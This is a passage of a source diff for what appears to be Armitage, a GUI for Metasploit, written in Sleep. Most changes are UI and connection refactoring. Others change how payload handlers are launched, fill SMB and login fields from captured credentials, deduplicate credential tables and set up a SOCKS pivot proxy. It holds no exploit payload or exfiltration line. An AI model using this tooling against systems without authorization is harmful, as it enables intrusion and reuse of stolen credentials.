cmd_safe("setg $1 $2");
|
||||
}
|
||||
|
||||
sub readg {
|
||||
|
@ -335,14 +338,22 @@ sub multi_handler {
|
|||
}
|
||||
|
||||
sub handler {
|
||||
local('%o $3');
|
||||
local('%o $3 $key $value');
|
||||
|
||||
# default options
|
||||
%o['PAYLOAD'] = $1;
|
||||
%o['LPORT'] = $2;
|
||||
%o['DisablePayloadHandler'] = 'false';
|
||||
%o['ExitOnSession'] = 'false';
|
||||
|
||||
# let the user override anything
|
||||
if ($3) {
|
||||
%o = copy($3);
|
||||
foreach $key => $value ($3) {
|
||||
%o[$key] = $value;
|
||||
}
|
||||
}
|
||||
|
||||
%o['PAYLOAD'] = "payload/ $+ $1";
|
||||
%o['LPORT'] = $2;
|
||||
|
||||
# make sure LHOST is correct
|
||||
if ('LHOST' !in %o) {
|
||||
if ("*http*" iswm $1) {
|
||||
%o['LHOST'] = lhost();
|
||||
|
@ -352,6 +363,7 @@ sub handler {
|
|||
}
|
||||
}
|
||||
|
||||
# let's do it...
|
||||
return launch('exploit', 'multi/handler', %o);
|
||||
}
|
||||
|
||||
|
|
|
@ -15,7 +15,7 @@ import graph.*;
|
|||
|
||||
import java.awt.image.*;
|
||||
|
||||
global('$frame $tabs $menubar $msfrpc_handle $REMOTE $cortana $MY_ADDRESS');
|
||||
global('$frame $tabs $menubar $msfrpc_handle $REMOTE $cortana $MY_ADDRESS $DESCRIBE @CLOSEME');
|
||||
|
||||
sub describeHost {
|
||||
local('$desc');
|
||||
|
@ -59,7 +59,7 @@ sub showHost {
|
|||
else if ("*XP*" iswm $match || "*2003*" iswm $match || "*.NET*" iswm $match) {
|
||||
push(@overlay, 'resources/windowsxp.png');
|
||||
}
|
||||
else if ("*8*" iswm $match) {
|
||||
else if ("*8*" iswm $match && "*2008*" !iswm $match) {
|
||||
push(@overlay, 'resources/windows8.png');
|
||||
}
|
||||
else {
|
||||
|
@ -139,7 +139,7 @@ sub _connectToMetasploit {
|
|||
$progress = [new ProgressMonitor: $null, "Connecting to $1 $+ : $+ $2", "first try... wish me luck.", 0, 100];
|
||||
|
||||
# keep track of whether we're connected to a local or remote Metasploit instance. This will affect what we expose.
|
||||
$REMOTE = iff($1 eq "127.0.0.1", $null, 1);
|
||||
$REMOTE = iff($1 eq "127.0.0.1" || $1 eq "::1" || $1 eq "localhost", $null, 1);
|
||||
|
||||
$flag = 10;
|
||||
while ($flag) {
|
||||
|
@ -160,11 +160,12 @@ sub _connectToMetasploit {
|
|||
}
|
||||
|
||||
# connecting locally? go to Metasploit directly...
|
||||
if ($1 eq "127.0.0.1" || $1 eq "::1" || $1 eq "localhost") {
|
||||
if ($REMOTE is $null) {
|
||||
$client = [new MsgRpcImpl: $3, $4, $1, long($2), $null, $debug];
|
||||
$aclient = [new RpcAsync: $client];
|
||||
$mclient = $client;
|
||||
initConsolePool();
|
||||
$DESCRIBE = "localhost";
|
||||
}
|
||||
# we have a team server... connect and authenticate to it.
|
||||
else {
|
||||
|
@ -172,6 +173,11 @@ sub _connectToMetasploit {
|
|||
setField(^msf.MeterpreterSession, DEFAULT_WAIT => 20000L);
|
||||
$mclient = setup_collaboration($3, $4, $1, $2);
|
||||
$aclient = $mclient;
|
||||
|
||||
if ($mclient is $null) {
|
||||
[$progress close];
|
||||
return;
|
||||
}
|
||||
}
|
||||
$flag = $null;
|
||||
}
|
||||
|
@ -239,10 +245,6 @@ sub _connectToMetasploit {
|
|||
[$progress setNote: "Connected: ..."];
|
||||
[$progress setProgress: 60];
|
||||
|
||||
if (!$REMOTE && %MSF_GLOBAL['ARMITAGE_TEAM'] eq '1') {
|
||||
showErrorAndQuit("Do not connect to 127.0.0.1 when\nrunning a team server.");
|
||||
}
|
||||
|
||||
dispatchEvent(&postSetup);
|
||||
}, \$progress));
|
||||
}
|
||||
|
@ -323,28 +325,23 @@ sub postSetup {
|
|||
}
|
||||
|
||||
sub main {
|
||||
local('$console $panel $dir');
|
||||
local('$console $panel $dir $app');
|
||||
|
||||
$frame = [new ArmitageApplication];
|
||||
$frame = [new ArmitageApplication: $__frame__, $DESCRIBE, $mclient];
|
||||
[$frame setTitle: $TITLE];
|
||||
[$frame setSize: 800, 600];
|
||||
|
||||
[$frame setIconImage: [ImageIO read: resource("resources/armitage-icon.gif")]];
|
||||
init_menus($frame);
|
||||
initLogSystem();
|
||||
|
||||
[$frame setIconImage: [ImageIO read: resource("resources/armitage-icon.gif")]];
|
||||
[$frame show];
|
||||
[$frame setExtendedState: [JFrame MAXIMIZED_BOTH]];
|
||||
|
||||
# this window listener is dead-lock waiting to happen. That's why we're adding it in a
|
||||
# separate thread (Sleep threads don't share data/locks).
|
||||
fork({
|
||||
[$frame addWindowListener: {
|
||||
[$__frame__ addWindowListener: {
|
||||
if ($0 eq "windowClosing" && $msfrpc_handle !is $null) {
|
||||
closef($msfrpc_handle);
|
||||
}
|
||||
}];
|
||||
}, \$msfrpc_handle, \$frame);
|
||||
}, \$msfrpc_handle, \$__frame__);
|
||||
|
||||
dispatchEvent({
|
||||
if ($client !is $mclient) {
|
||||
|
@ -375,7 +372,6 @@ sub checkDir {
|
|||
}
|
||||
}
|
||||
|
||||
setLookAndFeel();
|
||||
checkDir();
|
||||
|
||||
if ($CLIENT_CONFIG !is $null && -exists $CLIENT_CONFIG) {
|
||||
|
|
|
@ -679,12 +679,20 @@ sub addFileListener {
|
|||
$actions["SigningCert"] = $actions["*FILE*"];
|
||||
$actions["SigningKey"] = $actions["*FILE*"];
|
||||
$actions["Wordlist"] = $actions["*FILE*"];
|
||||
$actions["EXE::Custom"] = $actions["*FILE*"];
|
||||
$actions["EXE::Template"] = $actions["*FILE*"];
|
||||
$actions["WORDLIST"] = $actions["*FILE*"];
|
||||
$actions["REXE"] = $actions["*FILE*"];
|
||||
|
||||
# set up an action to choose a session
|
||||
$actions["SESSION"] = lambda(&chooseSession);
|
||||
|
||||
# helpers to set credential pairs from database... yay?
|
||||
$actions["USERNAME"] = lambda(&credentialHelper, \$model, $USER => "USERNAME", $PASS => "PASSWORD");
|
||||
$actions["PASSWORD"] = lambda(&credentialHelper, \$model, $USER => "USERNAME", $PASS => "PASSWORD");
|
||||
$actions["SMBUser"] = lambda(&credentialHelper, \$model, $USER => "SMBUser", $PASS => "SMBPass");
|
||||
$actions["SMBPass"] = lambda(&credentialHelper, \$model, $USER => "SMBUser", $PASS => "SMBPass");
|
||||
|
||||
# set up an action to pop up a file chooser for different file type values.
|
||||
$actions["RHOST"] = {
|
||||
local('$title $temp');
|
||||
|
|
|
@ -23,6 +23,7 @@ sub createEventLogTab {
|
|||
$client = [$cortana getEventLog: $console];
|
||||
[$client setEcho: $null];
|
||||
[$console updatePrompt: "> "];
|
||||
[new EventLogTabCompletion: $console, $mclient];
|
||||
}
|
||||
else {
|
||||
[$console updateProperties: $preferences];
|
||||
|
@ -63,6 +64,7 @@ sub c_client {
|
|||
# run this thing in its own thread to avoid really stupid deadlock situations
|
||||
local('$handle');
|
||||
$handle = [[new SecureSocket: $1, int($2), &verify_server] client];
|
||||
push(@CLOSEME, $handle);
|
||||
return wait(fork({
|
||||
local('$client');
|
||||
$client = newInstance(^RpcConnection, lambda({
|
||||
|
@ -91,9 +93,11 @@ sub setup_collaboration {
|
|||
%r = call($mclient, "armitage.validate", $1, $2, $nick, "armitage", 120326);
|
||||
if (%r["error"] eq "1") {
|
||||
showErrorAndQuit(%r["message"]);
|
||||
return $null;
|
||||
}
|
||||
|
||||
%r = call($client, "armitage.validate", $1, $2, $null, "armitage", 120326);
|
||||
$DESCRIBE = "$nick $+ @ $+ $3";
|
||||
return $mclient;
|
||||
}
|
||||
|
||||
|
|
|
@ -95,13 +95,13 @@ sub dispatchEvent {
|
|||
|
||||
sub showError {
|
||||
dispatchEvent(lambda({
|
||||
[JOptionPane showMessageDialog: $frame, $message];
|
||||
[JOptionPane showMessageDialog: $__frame__, $message];
|
||||
}, $message => $1));
|
||||
}
|
||||
|
||||
sub showErrorAndQuit {
|
||||
[JOptionPane showMessageDialog: $frame, $1];
|
||||
[System exit: 0];
|
||||
[JOptionPane showMessageDialog: $__frame__, $1];
|
||||
[$__frame__ closeConnect];
|
||||
}
|
||||
|
||||
sub ask {
|
||||
|
@ -155,7 +155,7 @@ sub chooseFile {
|
|||
[$fc setFileSelectionMode: [JFileChooser DIRECTORIES_ONLY]];
|
||||
}
|
||||
|
||||
[$fc showOpenDialog: $frame];
|
||||
[$fc showOpenDialog: $__frame__];
|
||||
|
||||
if ($multi) {
|
||||
return [$fc getSelectedFiles];
|
||||
|
@ -179,17 +179,18 @@ sub saveFile2 {
|
|||
[$fc setSelectedFile: [new java.io.File: $sel]];
|
||||
}
|
||||
|
||||
[$fc showSaveDialog: $frame];
|
||||
$file = [$fc getSelectedFile];
|
||||
if ($file !is $null) {
|
||||
return $file;
|
||||
if ([$fc showSaveDialog: $__frame__] == 0) {
|
||||
$file = [$fc getSelectedFile];
|
||||
if ($file !is $null) {
|
||||
return $file;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
sub saveFile {
|
||||
local('$fc $file');
|
||||
$fc = [new JFileChooser];
|
||||
[$fc showSaveDialog: $frame];
|
||||
[$fc showSaveDialog: $__frame__];
|
||||
$file = [$fc getSelectedFile];
|
||||
if ($file !is $null) {
|
||||
local('$ihandle $data $ohandle');
|
||||
|
@ -250,10 +251,10 @@ sub left {
|
|||
|
||||
sub dialog {
|
||||
local('$dialog $4');
|
||||
$dialog = [new JDialog: $frame, $1];
|
||||
$dialog = [new JDialog: $__frame__, $1];
|
||||
[$dialog setSize: $2, $3];
|
||||
[$dialog setLayout: [new BorderLayout]];
|
||||
[$dialog setLocationRelativeTo: $frame];
|
||||
[$dialog setLocationRelativeTo: $__frame__];
|
||||
return $dialog;
|
||||
}
|
||||
|
||||
|
@ -261,7 +262,15 @@ sub window {
|
|||
local('$dialog $4');
|
||||
$dialog = [new JFrame: $1];
|
||||
[$dialog setIconImage: [ImageIO read: resource("resources/armitage-icon.gif")]];
|
||||
[$dialog setDefaultCloseOperation: [JFrame EXIT_ON_CLOSE]];
|
||||
|
||||
fork({
|
||||
[$dialog addWindowListener: {
|
||||
if ($0 eq "windowClosing") {
|
||||
[$__frame__ closeConnect];
|
||||
}
|
||||
}];
|
||||
}, \$__frame__, \$dialog);
|
||||
|
||||
[$dialog setSize: $2, $3];
|
||||
[$dialog setLayout: [new BorderLayout]];
|
||||
return $dialog;
|
||||
|
@ -277,12 +286,14 @@ sub overlay_images {
|
|||
return %cache[join(';', $1)];
|
||||
}
|
||||
|
||||
local('$file $image $buffered $graphics');
|
||||
local('$file $image $buffered $graphics $resource');
|
||||
|
||||
$buffered = [new BufferedImage: 1000, 776, [BufferedImage TYPE_INT_ARGB]];
|
||||
$graphics = [$buffered createGraphics];
|
||||
foreach $file ($1) {
|
||||
$image = [ImageIO read: resource($file)];
|
||||
$resource = resource($file);
|
||||
$image = [ImageIO read: $resource];
|
||||
closef($resource);
|
||||
[$graphics drawImage: $image, 0, 0, 1000, 776, $null];
|
||||
}
|
||||
|
||||
|
@ -371,15 +382,6 @@ sub wrapComponent {
|
|||
return $panel;
|
||||
}
|
||||
|
||||
sub setLookAndFeel {
|
||||
local('$laf');
|
||||
foreach $laf ([UIManager getInstalledLookAndFeels]) {
|
||||
if ([$laf getName] eq [$preferences getProperty: "application.skin.skin", "Nimbus"]) {
|
||||
[UIManager setLookAndFeel: [$laf getClassName]];
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
sub thread {
|
||||
local('$thread');
|
||||
$thread = [new ArmitageThread: $1];
|
||||
|
@ -446,7 +448,7 @@ sub quickListDialog {
|
|||
|
||||
$button = [new JButton: $2];
|
||||
[$button addActionListener: lambda({
|
||||
[$callback : [$model getSelectedValueFromColumn: $table, $lead]];
|
||||
[$callback : [$model getSelectedValueFromColumn: $table, $lead], $table, $model];
|
||||
[$dialog setVisible: 0];
|
||||
}, \$dialog, $callback => $5, \$model, \$table, $lead => $3[0])];
|
||||
|
||||
|
@ -467,6 +469,13 @@ sub quickListDialog {
|
|||
[$dialog setVisible: 1];
|
||||
}
|
||||
|
||||
sub setTableColumnWidths {
|
||||
local('$col $width $temp');
|
||||
foreach $col => $width ($2) {
|
||||
[[$1 getColumn: $col] setPreferredWidth: $width];
|
||||
}
|
||||
}
|
||||
|
||||
sub tableRenderer {
|
||||
return [ATable getDefaultTableRenderer: $1, $2];
|
||||
}
|
||||
|
|
|
@ -8,10 +8,10 @@ import java.awt.event.*;
|
|||
|
||||
sub addHostDialog {
|
||||
local('$dialog $label $text $finish $button');
|
||||
$dialog = [new JDialog: $frame, "Add Hosts", 0];
|
||||
$dialog = [new JDialog: $__frame__, "Add Hosts", 0];
|
||||
[$dialog setSize: 320, 240];
|
||||
[$dialog setLayout: [new BorderLayout]];
|
||||
[$dialog setLocationRelativeTo: $frame];
|
||||
[$dialog setLocationRelativeTo: $__frame__];
|
||||
|
||||
$label = [new JLabel: "Enter one host/line:"];
|
||||
$text = [new JTextArea];
|
||||
|
|
|
@ -16,47 +16,7 @@ import java.awt.event.*;
|
|||
import ui.*;
|
||||
|
||||
sub manage_proxy_server {
|
||||
manage_job("Auxiliary: server/socks4a",
|
||||
# start server function
|
||||
{
|
||||
launch_dialog("SOCKS Proxy", "auxiliary", "server/socks4a", $null);
|
||||
},
|
||||
# description of job (for job kill function)
|
||||
{
|
||||
local('$host $port');
|
||||
($host, $port) = values($2["datastore"], @("SRVHOST", "SRVPORT"));
|
||||
return "SOCKS proxy is running on $host $+ : $+ $port $+ .\nWould you like to stop it?";
|
||||
}
|
||||
);
|
||||
|
||||
}
|
||||
|
||||
sub report_url {
|
||||
find_job($name, {
|
||||
if ($1 == -1) {
|
||||
showError("Server not found");
|
||||
}
|
||||
else {
|
||||
local('$job $host $port $uripath');
|
||||
$job = call($client, "job.info", $1);
|
||||
|
||||
($host, $port) = values($job["info"]["datastore"], @("SRVHOST", "SRVPORT"));
|
||||
$uripath = $job["info"]["uripath"];
|
||||
|
||||
local('$dialog $text $ok');
|
||||
$dialog = dialog("Output", 320, 240);
|
||||
$text = [new JTextArea];
|
||||
[$text setText: "http:// $+ $host $+ : $+ $port $+ $uripath"];
|
||||
|
||||
$button = [new JButton: "Ok"];
|
||||
[$button addActionListener: lambda({ [$dialog setVisible: 0]; }, \$dialog)];
|
||||
|
||||
[$dialog add: [new JScrollPane: $text], [BorderLayout CENTER]];
|
||||
[$dialog add: center($button), [BorderLayout SOUTH]];
|
||||
|
||||
[$dialog setVisible: 1];
|
||||
}
|
||||
});
|
||||
launch_dialog("SOCKS Proxy", "auxiliary", "server/socks4a", 1);
|
||||
}
|
||||
|
||||
sub find_job {
|
||||
|
@ -80,26 +40,6 @@ sub find_job {
|
|||
}, $name => $1, $function => $2));
|
||||
}
|
||||
|
||||
# manage_job(job name, { start job function }, { job dialog info })
|
||||
sub manage_job {
|
||||
local('$name $startf $stopf');
|
||||
($name, $startf, $stopf) = @_;
|
||||
|
||||
find_job($name, lambda({
|
||||
if ($1 == -1) {
|
||||
[$startf];
|
||||
}
|
||||
else {
|
||||
local('$job $confirm $foo $confirm');
|
||||
$job = call($client, "job.info", $1);
|
||||
$confirm = askYesNo([$stopf : $1, $job], "Stop Job");
|
||||
if ($confirm eq "0") {
|
||||
call_async($client, "job.stop", $1);
|
||||
}
|
||||
}
|
||||
}, \$startf, \$stopf));
|
||||
}
|
||||
|
||||
sub generatePayload {
|
||||
local('$file');
|
||||
$file = saveFile2();
|
||||
|
@ -450,6 +390,11 @@ sub _launch_dialog {
|
|||
elog("launched DNS enum for $domain");
|
||||
}
|
||||
}
|
||||
else if ($type eq "auxiliary" && $command eq "server/socks4a") {
|
||||
local('$host $port');
|
||||
($host, $port) = values($options, @('SRVHOST', 'SRVPORT'));
|
||||
elog("started SOCKS proxy server at $host $+ : $+ $port");
|
||||
}
|
||||
|
||||
launch_service($title, "$type $+ / $+ $command", $options, $type, $format => [$combo getSelectedItem]);
|
||||
}
|
||||
|
|
|
@ -15,8 +15,8 @@ sub logNow {
|
|||
if ([$preferences getProperty: "armitage.log_everything.boolean", "true"] eq "true") {
|
||||
local('$today $stream');
|
||||
$today = formatDate("yyMMdd");
|
||||
mkdir(getFileProper(dataDirectory(), $today, $2));
|
||||
$stream = %logs[ getFileProper(dataDirectory(), $today, $2, "$1 $+ .log") ];
|
||||
mkdir(getFileProper(dataDirectory(), $today, $DESCRIBE, $2));
|
||||
$stream = %logs[ getFileProper(dataDirectory(), $today, $DESCRIBE, $2, "$1 $+ .log") ];
|
||||
[$stream println: $3];
|
||||
}
|
||||
}
|
||||
|
@ -26,8 +26,8 @@ sub logCheck {
|
|||
local('$today');
|
||||
$today = formatDate("yyMMdd");
|
||||
if ($2 ne "") {
|
||||
mkdir(getFileProper(dataDirectory(), $today, $2));
|
||||
[$1 writeToLog: %logs[ getFileProper(dataDirectory(), $today, $2, "$3 $+ .log") ]];
|
||||
mkdir(getFileProper(dataDirectory(), $today, $DESCRIBE, $2));
|
||||
[$1 writeToLog: %logs[ getFileProper(dataDirectory(), $today, $DESCRIBE, $2, "$3 $+ .log") ]];
|
||||
}
|
||||
}
|
||||
}
|
||||
|
@ -38,7 +38,7 @@ sub logFile {
|
|||
local('$today $handle $data $out');
|
||||
$today = formatDate("yyMMdd");
|
||||
if (-exists $1 && -canread $1) {
|
||||
mkdir(getFileProper(dataDirectory(), $today, $2, $3));
|
||||
mkdir(getFileProper(dataDirectory(), $today, $DESCRIBE, $2, $3));
|
||||
|
||||
# read in the file
|
||||
$handle = openf($1);
|
||||
|
@ -46,7 +46,7 @@ sub logFile {
|
|||
closef($handle);
|
||||
|
||||
# write it out.
|
||||
$out = getFileProper(dataDirectory(), $today, $2, $3, getFileName($1));
|
||||
$out = getFileProper(dataDirectory(), $today, $DESCRIBE, $2, $3, getFileName($1));
|
||||
$handle = openf("> $+ $out");
|
||||
writeb($handle, $data);
|
||||
closef($handle);
|
||||
|
@ -70,7 +70,7 @@ sub initLogSystem {
|
|||
logFile([$file getAbsolutePath], "screenshots", ".");
|
||||
deleteFile([$file getAbsolutePath]);
|
||||
|
||||
showError("Saved " . getFileName($file) . "\nGo to View -> Reporting -> Activity Logs\n\nThe file is in:\n[today's date]/screenshots");
|
||||
showError("Saved " . getFileName($file) . "\nGo to View -> Reporting -> Activity Logs\n\nThe file is in:\n[today's date]/ $+ $DESCRIBE $+ /screenshots");
|
||||
}, \$image, \$title));
|
||||
}];
|
||||
}
|
||||
|
|
|
@ -54,6 +54,29 @@ sub host_selected_items {
|
|||
item($i, '3. Vista/7', '3', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "Vista"));
|
||||
item($i, '4. 8/RT', '4', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "8"));
|
||||
|
||||
item($h, "Set Label...", 'S', lambda({
|
||||
# calculate preexisting label to prompt with
|
||||
local('$label %l $host');
|
||||
|
||||
# get a label
|
||||
foreach $host ($hosts) {
|
||||
if ($label eq "") {
|
||||
$label = getHostLabel($host);
|
||||
}
|
||||
}
|
||||
|
||||
# ask for a label
|
||||
$label = ask("Set label to:", $label);
|
||||
if ($label !is $null) {
|
||||
foreach $host ($hosts) {
|
||||
%l[$host] = ["$label" trim];
|
||||
}
|
||||
call_async($mclient, "db.report_labels", %l);
|
||||
}
|
||||
}, $hosts => $2));
|
||||
|
||||
separator($h);
|
||||
|
||||
item($h, "Remove Host", 'R', clearHostFunction($2));
|
||||
}
|
||||
|
||||
|
@ -96,10 +119,13 @@ sub view_items {
|
|||
sub armitage_items {
|
||||
local('$m');
|
||||
|
||||
item($1, 'Preferences', 'P', &createPreferencesTab);
|
||||
|
||||
item($1, 'New Connection', 'N', {
|
||||
[new armitage.ArmitageMain: cast(@ARGV, ^String), $__frame__, $null];
|
||||
});
|
||||
separator($1);
|
||||
|
||||
item($1, 'Preferences', 'P', &createPreferencesTab);
|
||||
|
||||
dynmenu($1, 'Set Target View', 'S', {
|
||||
local('$t1 $t2');
|
||||
if ([$preferences getProperty: "armitage.string.target_view", "graph"] eq "graph") {
|
||||
|
@ -160,12 +186,13 @@ sub armitage_items {
|
|||
|
||||
separator($1);
|
||||
|
||||
item($1, 'Exit', 'x', {
|
||||
item($1, 'Close', 'C', {
|
||||
if ($msfrpc_handle !is $null) {
|
||||
closef($msfrpc_handle);
|
||||
}
|
||||
|
||||
[System exit: 0];
|
||||
map({ closef($1); }, @CLOSEME);
|
||||
[$__frame__ quit];
|
||||
});
|
||||
|
||||
}
|
||||
|
@ -223,7 +250,7 @@ sub help_items {
|
|||
|
||||
[$dialog add: $label, [BorderLayout CENTER]];
|
||||
[$dialog pack];
|
||||
[$dialog setLocationRelativeTo: $null];
|
||||
[$dialog setLocationRelativeTo: $__frame__];
|
||||
[$dialog setVisible: 1];
|
||||
});
|
||||
}
|
||||
|
|
|
@ -58,12 +58,38 @@ import ui.*;
|
|||
sub refreshCredsTable {
|
||||
thread(lambda({
|
||||
[Thread yield];
|
||||
local('$creds $cred');
|
||||
local('$creds $cred $desc $aclient %check $key');
|
||||
[$model clear: 128];
|
||||
$creds = call($mclient, "db.creds2", [new HashMap])["creds2"];
|
||||
foreach $desc => $aclient (convertAll([$__frame__ getClients])) {
|
||||
$creds = call($aclient, "db.creds2", [new HashMap])["creds2"];
|
||||
foreach $cred ($creds) {
|
||||
$key = join("~~", values($cred, @("user", "pass", "host")));
|
||||
if ($key in %check) {
|
||||
|
||||
}
|
||||
else if ($title ne "login" || $cred['ptype'] ne "smb_hash") {
|
||||
[$model addEntry: $cred];
|
||||
%check[$key] = 1;
|
||||
}
|
||||
}
|
||||
}
|
||||
[$model fireListeners];
|
||||
}, $model => $1, $title => $2));
|
||||
}
|
||||
|
||||
sub refreshCredsTableLocal {
|
||||
thread(lambda({
|
||||
[Thread yield];
|
||||
local('$creds $cred $desc $aclient %check $key');
|
||||
[$model clear: 128];
|
||||
$creds = call($client, "db.creds2", [new HashMap])["creds2"];
|
||||
foreach $cred ($creds) {
|
||||
if ($title ne "login" || $cred['ptype'] ne "smb_hash") {
|
||||
$key = join("~~", values($cred, @("user", "pass", "host")));
|
||||
if ($key in %check) {
|
||||
}
|
||||
else if ($title ne "login" || $cred['ptype'] ne "smb_hash") {
|
||||
[$model addEntry: $cred];
|
||||
%check[$key] = 1;
|
||||
}
|
||||
}
|
||||
[$model fireListeners];
|
||||
|
@ -71,7 +97,7 @@ sub refreshCredsTable {
|
|||
}
|
||||
|
||||
sub show_hashes {
|
||||
local('$dialog $model $table $sorter $o $user $pass $button $reverse $domain $scroll');
|
||||
local('$dialog $model $table $sorter $o $user $pass $button $reverse $domain $scroll $3');
|
||||
|
||||
$dialog = dialog($1, 480, $2);
|
||||
|
||||
|
@ -83,7 +109,12 @@ sub show_hashes {
|
|||
[$sorter setComparator: 2, &compareHosts];
|
||||
[$table setRowSorter: $sorter];
|
||||
|
||||
refreshCredsTable($model, $1);
|
||||
if ($3) {
|
||||
refreshCredsTableLocal($model, $1);
|
||||
}
|
||||
else {
|
||||
refreshCredsTable($model, $1);
|
||||
}
|
||||
|
||||
$scroll = [new JScrollPane: $table];
|
||||
[$scroll setPreferredSize: [new Dimension: 480, 130]];
|
||||
|
@ -94,7 +125,7 @@ sub show_hashes {
|
|||
|
||||
sub createCredentialsTab {
|
||||
local('$dialog $table $model $panel $export $crack $refresh');
|
||||
($dialog, $table, $model) = show_hashes("", 320);
|
||||
($dialog, $table, $model) = show_hashes("", 320, 1);
|
||||
[$dialog removeAll];
|
||||
|
||||
addMouseListener($table, lambda({
|
||||
|
@ -131,7 +162,7 @@ sub createCredentialsTab {
|
|||
|
||||
$refresh = [new JButton: "Refresh"];
|
||||
[$refresh addActionListener: lambda({
|
||||
refreshCredsTable($model, $null);
|
||||
refreshCredsTableLocal($model, $null);
|
||||
}, \$model)];
|
||||
|
||||
$crack = [new JButton: "Crack Passwords"];
|
||||
|
@ -372,3 +403,34 @@ sub launchBruteForce {
|
|||
[$console start];
|
||||
}, $type => $1, $module => $2, $options => $3, $title => $4));
|
||||
}
|
||||
|
||||
sub credentialHelper {
|
||||
thread(lambda({
|
||||
[Thread yield];
|
||||
|
||||
# gather our credentials please
|
||||
local('$creds $cred @creds');
|
||||
$creds = call($mclient, "db.creds2", [new HashMap])["creds2"];
|
||||
foreach $cred ($creds) {
|
||||
if ($PASS eq "SMBPass" || $cred['ptype'] ne "smb_hash") {
|
||||
push(@creds, $cred);
|
||||
}
|
||||
}
|
||||
|
||||
# pop up a dialog to let the user choose their favorite set
|
||||
quickListDialog("Choose credentials", "Select", @("user", "user", "pass", "host"), @creds, $width => 640, $height => 240, lambda({
|
||||
if ($1 eq "") {
|
||||
return;
|
||||
}
|
||||
|
||||
local('$user $pass');
|
||||
$user = [$3 getSelectedValueFromColumn: $2, 'user'];
|
||||
$pass = [$3 getSelectedValueFromColumn: $2, 'pass'];
|
||||
|
||||
[$model setValueForKey: $USER, "Value", $user];
|
||||
[$model setValueForKey: $PASS, "Value", $pass];
|
||||
[$model fireListeners];
|
||||
}, \$callback, \$model, \$USER, \$PASS));
|
||||
}, \$USER, \$PASS, \$model, $callback => $4));
|
||||
}
|
||||
|
||||
|
|
|
@ -107,10 +107,10 @@ sub pivot_dialog {
|
|||
}
|
||||
|
||||
local('$dialog $model $table $sorter $center $a $route $button');
|
||||
$dialog = [new JDialog: $frame, $title, 0];
|
||||
$dialog = [new JDialog: $__frame__, $title, 0];
|
||||
[$dialog setSize: 320, 240];
|
||||
[$dialog setLayout: [new BorderLayout]];
|
||||
[$dialog setLocationRelativeTo: $frame];
|
||||
[$dialog setLocationRelativeTo: $__frame__];
|
||||
|
||||
[$dialog setLayout: [new BorderLayout]];
|
||||
|
||||
|
|
|
@ -182,28 +182,21 @@ sub queryData {
|
|||
[$progress setProgress: 30];
|
||||
}
|
||||
|
||||
# 4. clients
|
||||
%r['clients'] = call($mclient, "db.clients")["clients"];
|
||||
|
||||
if ($progress) {
|
||||
[$progress setProgress: 35];
|
||||
}
|
||||
|
||||
# 5. sessions...
|
||||
# 4. sessions...
|
||||
%r['sessions'] = fixSessions(call($mclient, "db.sessions")["sessions"]);
|
||||
|
||||
if ($progress) {
|
||||
[$progress setProgress: 36];
|
||||
}
|
||||
|
||||
# 6. timeline
|
||||
# 5. timeline
|
||||
%r['timeline'] = fixTimeline(call($mclient, "db.events")['events']);
|
||||
|
||||
if ($progress) {
|
||||
[$progress setProgress: 38];
|
||||
}
|
||||
|
||||
# 7. hosts and services
|
||||
# 6. hosts and services
|
||||
local('@hosts @services $temp $h $s $x');
|
||||
call($mclient, "armitage.prep_export", $1);
|
||||
|
||||
|
@ -291,32 +284,27 @@ sub _generateArtifacts {
|
|||
|
||||
[$progress setProgress: 65];
|
||||
|
||||
# 4. clients
|
||||
dumpData("clients", @("host", "created_at", "updated_at", "ua_name", "ua_ver", "ua_string"), %data['clients']);
|
||||
|
||||
[$progress setProgress: 70];
|
||||
|
||||
# 5. hosts
|
||||
# 4. hosts
|
||||
dumpData("hosts", @("address", "mac", "state", "address", "address6", "name", "purpose", "info", "os_name", "os_flavor", "os_sp", "os_lang", "os_match", "created_at", "updated_at"), %data['hosts']);
|
||||
|
||||
[$progress setProgress: 80];
|
||||
|
||||
# 6. services
|
||||
# 5. services
|
||||
dumpData("services", @("host", "port", "state", "proto", "name", "created_at", "updated_at", "info"), %data['services']);
|
||||
|
||||
[$progress setProgress: 90];
|
||||
|
||||
# 7. sessions
|
||||
# 6. sessions
|
||||
dumpData("sessions", @("host", "local_id", "stype", "platform", "via_payload", "via_exploit", "opened_at", "last_seen", "closed_at", "close_reason"), %data['sessions']);
|
||||
|
||||
[$progress setProgress: 93];
|
||||
|
||||
# 8. timeline
|
||||
# 7. timeline
|
||||
dumpData("timeline", @("source", "username", "created_at", "info"), %data['timeline']);
|
||||
|
||||
[$progress setProgress: 96];
|
||||
|
||||
# 9. take a pretty screenshot of the graph view...
|
||||
# 8. take a pretty screenshot of the graph view...
|
||||
[$progress setNote: "host picture :)"];
|
||||
|
||||
makeScreenshot("hosts.png");
|
||||
|
@ -330,7 +318,7 @@ sub _generateArtifacts {
|
|||
|
||||
fire_event_async("user_export", %data);
|
||||
|
||||
return getFileProper(dataDirectory(), formatDate("yyMMdd"), "artifacts");
|
||||
return getFileProper(dataDirectory(), formatDate("yyMMdd"), $DESCRIBE, "artifacts");
|
||||
}
|
||||
|
||||
#
|
||||
|
@ -368,8 +356,6 @@ sub api_export_data {
|
|||
}
|
||||
|
||||
sub initReporting {
|
||||
global('$poll_lock @events'); # set in the dserver, not in stand-alone Armitage
|
||||
|
||||
wait(fork({
|
||||
global('$db');
|
||||
[$client addHook: "armitage.export_data", &api_export_data];
|
||||
|
|
|
@ -35,9 +35,7 @@ sub result {
|
|||
sub event {
|
||||
local('$result');
|
||||
$result = formatDate("HH:mm:ss") . " $1";
|
||||
acquire($poll_lock);
|
||||
push(@events, $result);
|
||||
release($poll_lock);
|
||||
[$events put: $result];
|
||||
}
|
||||
|
||||
sub client {
|
||||
|
@ -96,16 +94,6 @@ sub client {
|
|||
[[$handle getOutputStream] flush];
|
||||
}
|
||||
|
||||
# limit our replay of the event log to 100 events...
|
||||
acquire($poll_lock);
|
||||
if (size(@events) > 100) {
|
||||
$index = size(@events) - 100;
|
||||
}
|
||||
else {
|
||||
$index = 0;
|
||||
}
|
||||
release($poll_lock);
|
||||
|
||||
#
|
||||
# on our merry way processing it...
|
||||
#
|
||||
|
@ -183,33 +171,30 @@ sub client {
|
|||
else if ($method eq "armitage.log") {
|
||||
($data, $address) = $args;
|
||||
event("* $eid $data $+ \n");
|
||||
if ($address is $null) {
|
